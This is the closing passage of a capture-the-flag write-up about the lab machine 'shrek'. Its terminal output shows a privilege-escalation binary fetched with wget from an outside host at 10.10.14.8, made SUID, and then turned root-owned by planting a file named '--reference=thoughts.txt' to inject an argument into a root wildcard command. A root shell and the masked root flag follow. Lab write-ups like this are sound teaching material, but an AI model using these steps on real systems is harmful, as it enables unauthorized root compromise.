4.0K -rw-r--r-- 1 root root   91 Aug 22  2017 thoughts.txt
[sec@shrek src]$ wget http://10.10.14.8:9090/privesc
--2021-07-07 11:00:19--  http://10.10.14.8:9090/privesc
Connecting to 10.10.14.8:9090... connected.
HTTP request sent, awaiting response... 200 OK
Length: 16656 (16K) [application/octet-stream]
Saving to: ‘privesc’

privesc                                                                    100%[======================================================================================================================================================================================>]  16.27K  35.8KB/s    in 0.5s

2021-07-07 11:00:20 (35.8 KB/s) - ‘privesc’ saved [16656/16656]

[sec@shrek src]$ chmod 4755 privesc

[sec@shrek src]$ touch -- --reference=thoughts.txt

[sec@shrek src]$ ls -lash
total 32K
4.0K drwxr-xr-x 2 sec  root  4.0K Jul  7 11:00  .
4.0K drwxr-xr-x 8 sec  root  4.0K Oct  1  2020  ..
 20K -rwsr-xr-x 1 sec  users  17K Jul  7 10:48  privesc
   0 -rw-r--r-- 1 sec  users    0 Jul  7 11:00 '--reference=thoughts.txt'
4.0K -rw-r--r-- 1 root root    91 Aug 22  2017  thoughts.txt


[sec@shrek src]$ date
Wed Jul  7 11:01:26 UTC 2021

[sec@shrek src]$ date
Wed Jul  7 11:20:55 UTC 2021
[sec@shrek src]$ ls -lash privesc
20K -rwsr-sr-x 1 root root 17K Jul  7 11:06 privesc
[sec@shrek src]$ ./privesc

bash-4.4# id
uid=0(root) gid=100(users) groups=100(users),10(wheel),95(storage),98(power)
bash-4.4# cat /root/root.txt
27XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

And that's it! We managed to privesc to the root user and get the root flag.

Conclusion



Here we can see the progress graph :

My Bunker

Some Address 67120,
Duttlenheim, France.

About Ech0

This cute theme was created to showcase your work in a simple way. Use it wisely.